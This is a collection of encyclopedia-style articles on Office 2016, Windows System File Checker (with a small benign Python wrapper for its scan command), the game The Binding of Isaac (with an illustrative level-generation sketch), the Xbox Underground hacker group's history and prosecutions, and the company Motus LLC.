2010 since they use Windows Installer (MSI) technology. Microsoft requires that any 2013 versions be uninstalled, which it will offer to do automatically, before the 2016 versions can be installed. Despite not supporting Windows XP anymore, tooltips for various ribbon items (e.g. Paragraph, Font, Footnotes or Page Setup) still show screenshots of Office on Windows XP. Mac New features in the Mac release include an updated user interface that uses ribbons, full support for Retina Display, and new sharing features for Office documents. In Word, there is a new Design tab, an Insights feature, which is powered by Bing, and real-time co-authoring. In Excel, there is a Recommended Charts feature, and PivotTable Slicers. In PowerPoint, there are theme variants, which provide different color schemes for a theme. In Outlook, there is a Propose New Time feature, the ability to see calendars side by side, and a weather forecast in the calendar view. Outlook 2016 for Mac has very limited support for synchronization of collaboration services outside basic email. With version 15.25, Office for Mac transitioned from 32-bit to 64-bit by default. 
Users that require a 32-bit version for compatibility reasons will be able to download the 15.25 version as a manual, one-time update from the Microsoft Office website. All versions following 15.25 will be 64-bit only. Office for Mac received Touch Bar support in an update on February 16, 2017, following the launch of the 2016 MacBook Pro models. 32-bit versions of Office for Mac won't run on macOS Catalina; therefore, version 15.25 is the earliest version of Office for Mac that will run on the latest version of macOS. Support ended for this version on October 13, 2020 as Office for Mac doesn't have extended support unlike its Windows counterparts. Removed features In Office 2016 for Windows, a number of features were removed: Clip Art, and clip art offered through Office.com was removed. Images can instead be downloaded from Bing Images. Support for EPS images was removed for security reasons. The Document Information Panel was removed. Support for Exchange Server 2007 was removed from Outlook. Outlook Social Connector no longer works. PowerPoint can no longer open HTML files. Word can no longer publish blog posts to Blogger. Editions Traditional editions As with previous versions, Office 2016 is made available in several distinct editions aimed towards different markets. All traditional editions of Microsoft Office 2016 contain Word, Excel, PowerPoint and OneNote and are licensed for use on one computer. Five traditional editions of Office 2016 were released for Windows: Home & Student: This retail suite includes the core applications only - Word, Excel, PowerPoint, OneNote. Home & Business: This retail suite includes the core applications and Outlook. Standard: This suite, only available through volume licensing channels, includes the core applications, as well as Outlook and Publisher. Professional: This retail suite includes the core applications, as well as Outlook, Publisher, and Access. Professional Plus: This suite includes the core applications, as well as Outlook, Publisher, Access, and Skype for Business. Retail versions of Office 2016 for Windows use the Click-to-Run installer. Volume-licensed versions of Office 2016 use Windows Installer (MSI) technology. Some editions like Professional Plus are available in both retail (C2R) and volume (MSI) channels. Three traditional editions of Office 2016 were released for Mac: Home & Student: This retail suite includes the core applications only. Home & Business: This retail suite includes the core applications and Outlook. Standard: This suite, only available through volume licensing channels, includes the core applications and Outlook. Office 365 The Office 365 subscription services, which were previously aimed towards business and enterprise users, were expanded for Office 2016 to include new plans aimed at home use. The subscriptions allow use of the Office 2016 applications by multiple users using a software as a service model. Different plans are available for Office 365, some of which also include value-added services, such as 1 TB of OneDrive storage and 60 Skype minutes per month on the Home Premium plan. Design The user interface design of Office 2016 for Windows is relatively unchanged from its predecessor, Microsoft Office 2013. It retains the flat design that was introduced along with the Metro design language, albeit with a few modifications to the layout, in order to conform with the design of Microsoft Office Mobile. When Office 2016 was released, it came with three themes. 
The default theme, known as "colorful", features a solid color on the top band of the ribbon, corresponding to the color of the Office application being used, for example, a solid dark blue is featured prominently in Microsoft Word. The theme had been described as useful in making the tab headings more distinct. In addition, both the "white" and "dark grey" themes from Office 2013 are available as well, though no new backgrounds have been added, nor have any existing backgrounds been removed. A fourth "black" theme was added as part of an update in January 2016. The update was not released to users of the traditional editions. Criticism On November 13, 2018, a report initiated by the Government of the Netherlands showed that Microsoft Office 2016 and Office 365 do not comply with the GDPR, the European statute on privacy. OneNote 2016 and Publisher 2016 do not include the Tell Me search feature that was added to all other Office apps. In response to feedback, Microsoft later added the Tell Me box to the Universal Windows Platform (UWP) version of OneNote. See also List of office suites References External links 2015 software 2016 Office 2016
3085898
https://en.wikipedia.org/wiki/System%20File%20Checker
System File Checker
System File Checker (SFC) is a utility in Microsoft Windows that allows users to scan for and restore corrupted Windows system files. Overview Microsoft ships this utility with Windows 98, Windows 2000 and all subsequent versions of the Windows NT family of operating systems. In Windows Vista, Windows 7 and Windows 10, System File Checker is integrated with Windows Resource Protection (WRP), which protects registry keys and folders as well as critical system files. Under Windows Vista, sfc.exe can be used to check specific folder paths, including the Windows folder and the boot folder. Windows File Protection (WFP) works by registering for notification of file changes in Winlogon. If any changes are detected to a protected system file, the modified file is restored from a cached copy located in a compressed folder at %WinDir%\System32\dllcache. Windows Resource Protection works by setting discretionary access-control lists (DACLs) and access control lists (ACLs) defined for protected resources. Permission for full access to modify WRP-protected resources is restricted to the processes using the Windows Modules Installer service (TrustedInstaller.exe). Administrators no longer have full rights to system files. History Due to problems with Windows applications being able to overwrite system files in Windows 95, Microsoft has since implemented a number of security measures to protect system files from malicious attacks, corruptions, or problems such as DLL hell. System File Checker was first introduced on Windows 98 as a GUI utility. It offered scanning and restoration of corrupted system files by matching the version number against a database containing the original version number of the files in a fresh Windows 98 installation. This method of file protection was basic. It determined system files by file extension and file path. It was able to restore files from the installation media or a source specified by the user. Windows 98 did not offer real-time system file protection beyond file attributes; therefore, no preventive or reactive measure was available. All Windows NT-based operating systems since Windows 2000 introduced real-time file protection, called Windows File Protection (WFP). In addition, the System File Checker utility (sfc.exe) was reimplemented as a more robust command-line utility that integrated with WFP. Unlike the Windows 98 SFC utility, the new utility forces a scan of protected system files using Windows File Protection and allows the immediate silent restoration of system files from the DLLCache folder or installation media. SFC did not appear on Windows ME, as it was replaced with System File Protection (SFP). Similar to WFP, SFP offered real-time protection. Issues The System File Checker component included with versions of Windows 2000 earlier than Service Pack 4 overrode patches distributed by Microsoft; this was rectified in Windows 2000 Service Pack 4. Usage In Windows NT-based operating systems, System File Checker can be invoked via Windows Command Prompt (with Admin privilege), with the following command: sfc /scannow (to repair problems) or sfc /verifyonly (no repair) If it finds a problem, it will attempt to replace the problematic files from the DLL Cache (%WinDir%\System32\Dllcache\). If the file is not in the DLL Cache or the DLL Cache is corrupted, the user will be prompted to insert the Windows installation media or provide the network installation path. 
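For illustration, the checks described above can also be scripted. The following is a minimal sketch, not a Microsoft-provided tool: it assumes a Windows machine, a Python interpreter running with administrator rights, and that sfc.exe is reachable on the system PATH, and it simply wraps the commands shown above and passes the tool's exit code back to the caller.

import subprocess
import sys

def run_sfc(verify_only: bool = True) -> int:
    """Run System File Checker and return its exit code.

    verify_only=True runs 'sfc /verifyonly' (scan without repairing);
    otherwise 'sfc /scannow' is run (scan and attempt repairs).
    Requires an elevated (administrator) process on Windows.
    """
    flag = "/verifyonly" if verify_only else "/scannow"
    # On Windows Vista and later, detailed results are written to
    # %WinDir%\Logs\CBS\CBS.log; the console output only summarizes them.
    completed = subprocess.run(["sfc", flag])
    return completed.returncode

if __name__ == "__main__":
    sys.exit(run_sfc(verify_only=True))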
System File Checker determines the Windows installation source path from the registry values SourcePath and ServicePackSourcePath. It may keep prompting for the installation media even if the user supplies it if these values are not correctly set. In Windows Vista and onwards, files are protected using Access control lists (ACLs), however, the above command has not changed. System File Checker in Windows Vista and later Windows operating systems can scan specified files. Also, scans can be performed against an offline Windows installation folder to replace corrupt files, in case the Windows installation is not bootable. For performing offline scans, System File Checker must be run from another working installation of Windows Vista or a later operating system or from the Windows setup DVD or a recovery drive which gives access to the Windows Recovery Environment. In cases where the component store is corrupted, the "System Update Readiness tool" (CheckSUR) can be installed on Windows 7, Windows Vista, Windows Server 2008 R2 or Windows Server 2008, replaced by "Deployment Image Service and Management Tool" (DISM) for Windows 10, Windows 8.1, Windows 8, Windows Server 2012 R2 or Windows Server 2012. This tool checks the store against its own payload and repairs the corruptions that it detects by downloading required files through Windows update. References Further reading External links sfc | Microsoft Docs Use the System File Checker tool to repair missing or corrupted system files Description of Windows XP and Windows Server 2003 System File Checker (Sfc.exe) Windows administration Windows components
33251782
https://en.wikipedia.org/wiki/The%20Binding%20of%20Isaac%20%28video%20game%29
The Binding of Isaac (video game)
The Binding of Isaac is a roguelike video game designed by independent developers Edmund McMillen and Florian Himsl. It was released in 2011 for Microsoft Windows, then ported to OS X and Linux. The game's title and plot are inspired by the Biblical story of the Binding of Isaac. In the game, Isaac's mother receives a message from God demanding the life of her son as proof of her faith, and Isaac, fearing for his life, flees into the monster-filled basement of their home where he must fight to survive. Players control Isaac or one of seven other unlockable characters through a procedurally generated dungeon in a roguelike manner, fashioned after those of The Legend of Zelda, defeating monsters in real-time combat while collecting items and power-ups to defeat bosses and eventually Isaac's mother. The game was the result of a week-long game jam between McMillen and Himsl to develop a The Legend of Zelda-inspired roguelike that allowed McMillen to showcase his feelings about both positive and negative aspects of religion that he had come to discover from conflicts between his Catholic and born-again Christian family members while growing up. McMillen had considered the title a risk, but one he could take after the financial success of Super Meat Boy, and released it without much fanfare to Steam in September 2011, not expecting many sales. The game soon gained popularity, partially as a result of various Let's Play videos showcasing the title. McMillen and Himsl released an expansion, "Wrath of the Lamb", in May 2012, but were prevented from further expansion by limitations of the Flash platform. They had started working with Nintendo in 2012 to release a 3DS version, but Nintendo later backed out of the deal, citing controversy over the game's religious themes. Developer Nicalis worked with McMillen in 2014 to complete a remake of the game, The Binding of Isaac: Rebirth, bringing additional features McMillen had planned that exceeded Flash's limitations, as well as improving the game's graphics and enabling ports for other systems beyond personal computers, including PlayStation 4 and Vita, Xbox One, Wii U, Nintendo 3DS, and the Nintendo Switch. This remake has commonly been cited as one of the best roguelike games of all time. McMillen later worked with James Id to develop The Legend of Bum-bo, which serves as a prequel to The Binding of Isaac. The Binding of Isaac has been well received, with critics praising the way its roguelike nature encourages repeated playthroughs. By July 2014, McMillen reported over 3 million copies had been sold. The game has been credited with contributing to renewed interest in the roguelike genre from both players and developers. Gameplay The Binding of Isaac is a top-down dungeon crawler game, presented using two-dimensional sprites, in which the player controls Isaac or other unlockable characters as they explore the dungeons located in Isaac's basement. The characters differ in speed, amount of health, amount of damage they deal, and other attributes. The game's mechanics and presentation are similar to the dungeons of The Legend of Zelda, while incorporating random, procedurally generated levels in the manner of a roguelike game. On each floor of the basement dungeon, the player must fight monsters in a room before continuing on to the next room. This is most commonly done by firing the character's tears as bullets in the style of a twin-stick shooter, but the player can also use a limited supply of bombs to damage enemies and clear out parts of the room. 
Other methods of defeating enemies become possible as the character gains power-ups: items that are automatically worn by the player-character when picked up and that can alter the character's core attributes, such as increasing health or the strength of each tear, or cause additional side effects, such as allowing charged tear shots to be fired after holding down a controller button for a short while, or providing a means to fire tears behind the character. Power-ups include passive items that improve the character's attributes automatically, active power-ups that can be used once before they are recharged by completing additional rooms in the dungeon, and single-use power-ups such as pills or Tarot cards that confer a one-time benefit when used, such as regaining full health, or increasing or decreasing all attributes of the character. The effects of power-ups stack, so the player may come across highly beneficial power-up combinations. Once a room is cleared of monsters, it will remain clear, allowing the player to retrace their way through the level, though once they move on to the next level, they cannot return. Along the way, the player can collect money to buy power-ups from shopkeepers, keys to unlock special treasure rooms, and new weapons and power-ups to strengthen their chances against the enemies. The player's health is tracked by a number of hearts; if the character loses all of their hearts, the game ends in permadeath and the player must start over from a freshly generated dungeon. Each floor of the dungeon includes a boss that the player must defeat before continuing to the next level. On the sixth of eight floors, the player fights Isaac's mother; after defeating her, Isaac crawls into her womb. Later levels are significantly harder, culminating in a fight against the heart of Isaac's mother on the eighth floor. An optional ninth floor, Sheol, contains the boss Satan. Winning the game with certain characters or under certain conditions unlocks new power-ups that might appear in the dungeon or the ability to use one of the other characters. The game tracks the various power-ups that the player has found over time, which can be reviewed from the game's menus. Plot The Binding of Isaac's plot is very loosely inspired by the biblical story of the same name. Isaac, a child, and his mother live in a small house on a hill, both happily keeping to themselves, with Isaac drawing pictures and playing with his toys, and his mother watching Christian broadcasts on television. Isaac's mother then hears "a voice from above", a voice that she believes is that of God Himself, stating that her son is corrupted by sin and needs to be saved. It asks her to remove all that is evil from Isaac, in an attempt to save him. His mother agrees, taking away his toys, drawings, and even his clothes. The voice once again speaks to Isaac's mother, stating that Isaac must be cut off from all that is evil in the world. Once again, his mother agrees, and locks Isaac inside his room. Once more, the voice speaks to Isaac's mother. It states that she has done well, but it still questions her devotion, and tells her to sacrifice her son. She agrees, grabs a butcher's knife from the kitchen, and walks to Isaac's room. Isaac, watching through a sizable crack in his door, starts to panic. He finds a trapdoor hidden under his rug and jumps in, just as his mother bursts through his bedroom door. Isaac then puts the paper he was drawing onto his wall, which becomes the title screen. 
Until the release of The Binding of Isaac: Repentance, there is no clear conclusion, or even consistent narrative, to the story past this point. The game features 13 possible endings, one after each major boss fight. The first ten endings serve as introductions to unlocked items and mechanics, while the final three suggest that Isaac climbs into a toy chest and suffocates. During the game's loading points, Isaac is shown curled up in a ball, crying. His thoughts are visible, ranging from rejection by his mother and humiliation from his peers to a scenario involving his own death. Development and release The Binding of Isaac was developed following the release of Super Meat Boy, which McMillen had considered a significant risk and a large investment of time. When Super Meat Boy was released to both critical praise and strong sales, he felt that, with his finances supported by its sales, he no longer had to worry about the consequences of taking risks. He also considered that he could take further risks with the concept. He had been planning to work with Tommy Refenes, the co-developer of Super Meat Boy, on their next game, Mew-Genics, but as Refenes had taken some time off, McMillen looked to develop something he considered "low stress" and with minimal expectations, such as an Adobe Flash game. The Binding of Isaac's main concept was the result of a week-long game jam that McMillen held with Florian Himsl while Refenes was on vacation. The concept McMillen had was two-fold: to develop a roguelike title based on the first The Legend of Zelda game's dungeon structure, and to develop a game that addressed his thoughts on religion. McMillen had been inspired by Shigeru Miyamoto, the designer of the original Zelda games. McMillen saw the potential of the procedural generation aspect of roguelikes such as Spelunky and Desktop Dungeons, and considered that working on procedural generation would help toward the development of his planned game Mew-Genics. Random rooms were created for each floor of the dungeon by selecting ten to twenty rooms from a pre-built library of 200 layouts, adding in the monsters, items, and other features, and then including fixed rooms that would be found on each floor, such as a boss room and treasure room (a simplified sketch of this scheme appears below). In expanding the gameplay, McMillen used the structure of Zelda's dungeons to design how the player would progress through the game. In a typical Zelda dungeon, according to McMillen, the player acquires a new item that helps them progress farther in the game; he took the same inspiration to ensure that each level in Isaac included at least one item, plus a bonus item for defeating the boss, that would boost the character's attributes. McMillen also wanted to encourage players to experiment to learn how things work within Isaac, mirroring what Miyamoto had done with the original Zelda game. He designed the level progression to become more difficult as the player advanced, and added content that became available after beating the game, so as to make the game feel longer. McMillen designed four of the selectable characters based on the main classes of Dungeons & Dragons: fighter, thief, cleric and wizard. On the story side, McMillen explained that the religious tone is based on his own experiences with his family, split between Catholics and born-again Christians. 
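The floor-generation scheme described above, drawing a set of layouts from a fixed library, populating them, and then appending the fixed rooms every floor receives, can be illustrated with a short sketch. This is a hypothetical illustration only, not the game's actual code: the Room fields, the populate step, and the library standing in for the roughly 200 pre-built layouts are placeholder assumptions based on the figures given above.

import random
from dataclasses import dataclass, field

@dataclass
class Room:
    layout_id: int
    kind: str = "normal"               # "normal", "boss", or "treasure"
    monsters: list = field(default_factory=list)
    items: list = field(default_factory=list)

# Placeholder standing in for the pre-built library of about 200 room layouts.
LAYOUT_LIBRARY = list(range(200))

def generate_floor(rng: random.Random) -> list:
    """Build one floor: ten to twenty random layouts plus the fixed rooms each floor gets."""
    count = rng.randint(10, 20)
    rooms = [Room(layout_id=lid) for lid in rng.sample(LAYOUT_LIBRARY, count)]
    for room in rooms:
        # Populate each chosen layout with monsters and, sometimes, an item (details invented here).
        room.monsters = ["monster_%d" % rng.randint(0, 9) for _ in range(rng.randint(1, 4))]
        if rng.random() < 0.3:
            room.items.append("item_%d" % rng.randint(0, 99))
    # Every floor also contains fixed special rooms, such as a boss room and a treasure room.
    rooms.append(Room(layout_id=-1, kind="boss"))
    rooms.append(Room(layout_id=-1, kind="treasure"))
    return rooms

if __name__ == "__main__":
    floor = generate_floor(random.Random(42))
    print("Generated %d rooms:" % len(floor), [r.kind for r in floor])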
McMillen noted that while both sides drew their faith from the same Bible, their attitudes were different; he found some of the Catholic rituals his family performed inspiring, while other beliefs they held condemned several pastimes McMillen had participated in, such as Dungeons & Dragons. He took inspiration from that duality to create Isaac's narrative, showing how religion can instill harmful feelings while also bringing about dark creativity. McMillen also considered the scare tactics used by the Christian right to condemn popular media of the 1980s, such as heavy metal and video games. McMillen noted how many of the propaganda films from this period featured satanic cults that would sacrifice children and how many Biblical stories mirrored these concepts, and he subsequently built the story around that. He also stated that he tended to like "really weird stuff" relating to toilet humor and similar types of off-color humor that did not sit well with his family and which he had explored in previous games before Super Meat Boy. While Super Meat Boy helped to make his reputation (including being one of the featured developers in Indie Game: The Movie), he felt it was a "safe" game given his preferred type of humor, and used Isaac to return to this form, considering that the game could easily be "career suicide" but would make a statement about what he really wanted to do. The Binding of Isaac began as a game jam between McMillen and Florian Himsl. Within the week, they had a working game written in Adobe Flash's ActionScript 2. The two agreed to complete it as a game they could release on Steam, though with no expectations of sales. Completion of the game from the prototype to the finished state took about three months of part-time development. During this time, they discovered there were several limitations on the size and scope of both Flash and ActionScript that limited how much they could do with the game, but they continued to use the tools in order to release the title. McMillen said that because they were not worried about sales, they were able to work with Valve to release the game without fears of censorship or having to seek an ESRB rating. Releasing through Steam also enabled them to update the game freely, which they did several times shortly after its initial release, something they could not have done on consoles without significant cost to themselves. They released without significant end-user testing, as it would have taken several hundred users to go through all the various combinations of items that a player could collect, and McMillen recognized they had released the title with their buyers effectively acting as playtesters. A week after the Steam release, McMillen released a demo version via the website Newgrounds. Merge Games produced a physical edition that included the game, soundtrack, and a poster, for stores in the United Kingdom in 2012. ActionScript 2 was an outdated language at the time, and caused many low-end and even high-end PCs to encounter slowdown at times. It also lacked controller support, and Tommy Refenes had to help write an achievement program that would allow people to unlock Steam achievements. McMillen later stated that he would not have made the game in Flash at all if he had known anyone would actually care about Isaac. Soundtrack Danny Baranowsky, the game's composer, who previously worked with McMillen on Super Meat Boy, was involved early on with the project, shortly after the completion of the first prototype. 
McMillen and Baranowsky worked back and forth, with McMillen providing artwork from the game and allowing Baranowsky to develop the musical themes based on it; this would often lead to McMillen creating more art to support the music as it progressed. Baranowsky had been drawn to The Binding of Isaac because, though the game puts forth a dark tone, he felt it had rather silly undertones underneath, such that one could not take it too seriously. Some of the songs were inspired by classical choral music but modified to fit the theme of the game. Other works were inspired by boss fight songs composed by Nobuo Uematsu for the Final Fantasy series. Baranowsky also had additional time after finishing the main songs for the game to craft short additional tracks that were used for special rooms like shops and secret areas. Cancelled Nintendo 3DS port In January 2012, after the game had surpassed 450,000 units sold, McMillen stated that he was approached by a publisher interested in bringing the title to the Nintendo 3DS as a downloadable title through the Nintendo eShop, though McMillen had reservations given Nintendo's reputation for less risqué content. In late February, McMillen stated that Nintendo had rejected the game because of "questionable religious content". He believed this stemmed from Germany's classification board rating the existing Windows version of the game as "age 16+" due to potentially blasphemous content, the first time a game had been rated in that manner in the country. McMillen noted that Nintendo executives he spoke to before this decision had indicated some blasphemous content would have been acceptable, and were more concerned with overtly religious content. He also noted that he was approached about his willingness to make some changes to the game to make it more suitable for the 3DS, but was never given a list of specific changes. McMillen speculated that Nintendo was worried about its reputation; because of the game's resemblance to The Legend of Zelda, an unknowing child could potentially have downloaded the title and been shocked by the content, which would have reflected poorly on Nintendo. Several game websites were outraged at Nintendo's decision. Though disappointed with Nintendo's decision, McMillen did not think the loss of the 3DS port was a major issue, and saw a brief sales burst on Steam as the news was covered on gaming websites. McMillen further praised the flexibility of the Steam platform, which does not require games to obtain ESRB ratings to be published on the service, and the freedom it gave publishers regardless of a game's content. Nintendo would later allow the Rebirth remake to be released on both the New Nintendo 3DS and the Wii U in 2015; this came in part because Nintendo's Steve Singer (vice president of licensing), Mark Griffin (a senior manager in licensing), and Dan Adelman (the head of indie development) championed support for The Binding of Isaac. Wrath of the Lamb An expansion to the game, entitled Wrath of the Lamb, was released through Steam on May 28, 2012. McMillen was inspired to create the expansion not only due to the success of the base game, but because his wife Danielle had fully completed the base game, the first game he had written in which she had shown significant interest. The expansion adds 70% more content to the original, and contains more than 10 bosses, over 100 items, over 40 unlocks, two additional endings, and two additional optional levels. 
This expansion added new "alternate" floors, which can replace the normal floors, creating an alternate route through the game. These floors contain harder enemies and a different set of bosses. Other features include a new item type, Trinkets, which have a variety of passive or triggered effects when carried, as well as new room types. McMillen had plans to release a second expansion beyond Wrath of the Lamb, but was constrained by the limits of Flash at this point. The Binding of Isaac: Rebirth Sometime in 2012, after Isaac's release, McMillen was approached by Tyrone Rodriguez of Nicalis, who asked if McMillen was interested in bringing the game to consoles. McMillen was interested, but insisted that they would have to reprogram the game to get around the limitations of Flash and to include Wrath of the Lamb and the second planned expansion, remaking the game's graphics in a 16-bit style instead of vector-based Flash graphics. Further, McMillen wanted nothing to do with the business aspects of the game, having recounted the difficulties he had in handling this for Super Meat Boy. Nicalis agreed to these terms, and began work in 2012 on what would become The Binding of Isaac: Rebirth, an improved version of the title. It was released on November 4, 2014, for Microsoft Windows, OS X, Linux, PlayStation 4, and PlayStation Vita, with versions for the Wii U, New Nintendo 3DS, and Xbox One released on July 23, 2015. The game introduced numerous new playable characters, items, enemies, bosses, challenges, and room layout seeds for floors. A content pack entitled Afterbirth was released for Rebirth starting in October 2015, adding new alternate chapters, characters and items, as well as a wave-based Greed mode. A second update, Afterbirth+, added further content and support for user-created modifications, and was released on January 3, 2017. A third and final update, Repentance, added substantial new content and bug fixes, incorporating most of the content from Antibirth, one of the largest fan-made expansions, including a new alternate path through the whole game as well as numerous character variations and new final bosses. This expansion was released on March 31, 2021. Other games McMillen collaborated with James Id to develop The Legend of Bum-bo, which was released on November 12, 2019, for Windows and later for iOS and Switch. Bum-bo is described as a prequel to Isaac, and Isaac and Gish appear as characters in the game. Isaac also appears as a playable character in the fighting game Blade Strangers and the puzzle game Crystal Crisis. On June 27, 2018, Edmund McMillen announced and later released a card game adaptation in cooperation with Studio 71 titled The Binding of Isaac: Four Souls. Reception The Binding of Isaac received generally favorable reviews from game critics. On Metacritic, the game has an average of 84 out of 100 based on 30 reviews. The Binding of Isaac has been received by reviewers as a game with high replayability, owing to the extensive range and combinations of power-ups that the player can encounter during a run-through, built on an accessible Zelda-inspired framework that most video game players would recognize and easily come to understand. John Teti for Eurogamer praised the game for its replayability through the randomization aspects, calling it "the most accessible exploration of the roguelike idea" that he had seen. 
Edge similarly commented on the lure to replay the game due to its short playthrough time, calling it "an imaginative and quick-witted arcade experience that manages to be both depraved and strangely sweet by turn". GameSpot's Maxwell McGee stated that the game has smartly removed extraneous features such that "what remains is a tightly focused game that continues to feel fresh even after multiple completions". Though the game is considered accessible to new players, reviewers found it to be a difficult challenge, often shaped by the randomness of which power-ups the player happened to acquire during a single run. Writers for The A.V. Club rated the game an A on a grading scale, and favorably compared the title to McMillen's Super Meat Boy, requiring the player to have "masochistic patience in the face of terrible odds". This difficulty was considered to be mitigated by the large number of possible power-ups that the game offers, most of which would not be seen by players until they have replayed the game many times. McGee noted that while players can review what items they have discovered prior to a run-through, this feature does not explain what each item does, leaving the effect to be determined by the player while in game. Game Informer's Adam Biessener noted that while The Binding of Isaac had a number of software bugs on release that may briefly detract from the experience, "McMillen's vision shines through" in the game's playability, art style, and story. Neilie Johnson for IGN found that some players may be put off by the game's crudeness but otherwise "it's totally random, highly creative and brutally unforgiving". Similarly, Nathan Muenier for GameSpy noted the game had some shock value that one must work past, but otherwise was "imaginative" and "utterly absorbing". Alternatively, Jordan Devore for Destructoid considered the visual style of the game one of its "biggest selling points", following from McMillen's past style of dark comedy in Super Meat Boy. Baranowsky's soundtrack was found by reviewers to suit the themes of the game well, and to be used appropriately to avoid extensive repetition during a playthrough. Kirk Hamilton of Kotaku described the soundtrack as a combination of several genres and the musical styles of Danny Elfman, Muse, and Final Fantasy that created something "dark and unique". The Binding of Isaac was nominated in the Best Independent Game category at the 2011 Spike Video Game Awards, but lost to Minecraft. McMillen had only expected the game to sell a few hundred copies when he released it on Steam. For the first few months after its release, sales were roughly a few hundred per day, but shortly thereafter McMillen found that sales suddenly increased, a boost he attributed to the numerous Let's Play videos that players had published to showcase the game. This popularity also drew interest from players who wanted to create custom mods for the game, which would become a factor in the design of the sequel to better support modding. By November 2012, the game had sold over one million copies, with at least one-quarter of those buyers having purchased the "Wrath of the Lamb" expansion. As of July 2014, the game had sold over 3 million copies. By July 2015, following the release of Rebirth, the combined games had sold over 5 million units. 
The Binding of Isaac is said to be a contributing factor towards the growth of the roguelike genre since around 2010, with its success paving the way for later games that used the roguelike formula, such as FTL: Faster Than Light and Don't Starve. References External links 2011 video games Cultural depictions of Isaac Cultural depictions of Abraham Abortion in fiction Cancelled Nintendo 3DS games Criticism of Christianity Roguelike video games Dungeon crawler video games Flash games Game jam video games Indie video games Linux games MacOS games Shooter video games Single-player video games Seven deadly sins in popular culture Video games about children Video games developed in the United States Video games scored by Danny Baranowsky Video games using procedural generation Video games with expansion packs Video games about religion Windows games Child abuse in fiction Four Horsemen of the Apocalypse in popular culture
46945828
https://en.wikipedia.org/wiki/Xbox%20Underground
Xbox Underground
Xbox Underground was an international hacker group responsible for gaining unauthorized access to the computer network of Microsoft and its development partners, including Activision, Epic Games, and Valve, in order to obtain sensitive information relating to Xbox One and Xbox Live. Microsoft Microsoft's computer network was compromised repeatedly by the Xbox Underground between 2011 and 2013. According to a 65-page indictment, the hackers spent "hundreds of hours" searching through Microsoft's network, copying log-in credentials, source code, technical specifications and other data. This culminated in the perpetrators carrying out a physical theft, using stolen credentials to enter "a secure building" at Microsoft's Redmond headquarters and exiting with Xbox development kits. Group members say they were driven by a strong curiosity about Microsoft's then-unreleased Xbox One console and associated software. Beginning in or about January 2011, Microsoft was the victim of incidents of unauthorized access to its computer networks, including GDNP's protected computer network, which resulted in the theft of log-in credentials, trade secrets and intellectual property relating to its Xbox gaming system. (p. 4) In or about September 2013, Alcala and Pokora brokered a physical theft, committed by A.S. and E.A., of multiple Xbox Development Kits (XDKs) from a secure building on Microsoft's Redmond, Washington campus. Using stolen access credentials to a Microsoft building, A.S. and E.A. entered the building and stole three non-public versions of the Xbox One console... (p. 31) Apache helicopter simulator software The group is also accused of breaching the computer network of Zombie Studios, through which it obtained Apache helicopter simulator software developed for the United States military. David Pokora was quoted as saying: "Have you been listening to the [expletive] that I've done this past month? I have [expletive] to the U.S. military. I have [expletive] to the Australian Department of Defense ... I have every single big company – Intel, AMD, Nvidia – any game company you could name, Google, Microsoft, Disney, Warner Bros., everything." Members Four members of the group have pleaded guilty to charges. David Pokora, the first foreign hacker ever to be sentenced on United States soil, received an 18-month prison term on April 23, 2014, and was released in July 2015. Nathan LeRoux and Sanad Odeh Nesheiwat were sentenced on June 11 and received 24 months and 18 months, respectively; Austin Alcala was due for sentencing in July, though he went on to cooperate with the FBI in resolving another criminal case involving the illegal trade of FIFA coins. Dylan Wheeler (referred to in the indictment as D.W.), currently out of reach of the United States, lived in Australia at the time and faced a range of charges. He was not convicted, having fled from Australia to Dubai and eventually to the Czech Republic, citing human rights and political issues with his trial. He cannot be extradited from the Czech Republic because he holds Czech citizenship, and he currently lives in the UK. His mother, Anna Wheeler, was later jailed for more than two years for helping him flee Australia to avoid criminal charges. Wheeler alleges that a sixth member, Justin May (referred to as "Person A"), worked with the FBI "to bring down the group". May had previously been placed on pre-trial probation for an earlier offense involving data theft, the agreement of which required him to stay off Xbox Live. 
He came under renewed interest from the FBI in 2017 after agents seized a new BMW coupe and $38,595 in cash hidden throughout his home. In June 2021, May was sentenced to seven years in prison for defrauding several technology companies, among them Microsoft and Cisco Systems, of over $3.5 million by exploiting warranty policies to illegitimately receive replacements, which were then sold online. References 2011 crimes 2012 crimes 2013 crimes Hacker groups Hacking in the 2010s Microsoft Xbox
53024887
https://en.wikipedia.org/wiki/Motus%2C%20LLC
Motus, LLC
Motus is a workforce management company headquartered in Boston, Massachusetts, that develops fleet management software. History Motus was founded in 2004 as Corporate Reimbursement Services, Inc. (CRS) by Gregg Darish, and changed its name to Motus in 2014. Craig Powell serves as President and CEO. In August 2014, Motus released an integration with American cloud computing company Salesforce.com to instantly associate business stops with accounts, contacts and leads in the Salesforce customer relationship management (CRM) product. In 2015, Motus announced an integration with American travel management company Concur Technologies to allow employees to submit mileage to Motus, calculate individual reimbursement amounts, and automatically create expense reports in Concur Expense for manager approval. In September 2015, Motus released an integration with Oracle Corporation to instantly associate Motus administrative activities with Oracle customer relationship management (CRM) software. In 2018, Motus was acquired by private equity and growth capital firm Thoma Bravo, LLC and merged with Runzheimer, creating a leading provider of mileage reimbursement technologies serving companies with complex transportation needs. It also partnered with FleetCor Technologies, Inc., which provides fuel cards and workforce payment products and services. In September 2019, Motus acquired the Danvers, Massachusetts-based mobile expense management firm Wireless Analytics. In September 2020, Motus acquired the Augusta, Georgia-based firm Vision Wireless, further strengthening its mobile expense management services. Recognition Motus was named one of the 20 Most Promising Field Service Solution Providers by CIOReview, Top 10 Fleet Management Solution Providers by Logistics Tech Outlook, and Best Employee Efficiency Technology by MITX in 2017. It also won a 2018 HRO Today TekTonic Award in the Mobile category. The company has been named among the best places to work in Boston and Milwaukee, a company of the year, and one of the largest mobile technology companies in Massachusetts. References See also Business mileage reimbursement rate Tax deduction Vehicle miles traveled tax 2004 establishments in Massachusetts Software companies established in 2004 Companies based in Boston Business software companies Human resource management software Software companies based in Massachusetts 2018 mergers and acquisitions Private equity portfolio companies Software companies of the United States
1029605
https://en.wikipedia.org/wiki/Naval%20flight%20officer
Naval flight officer
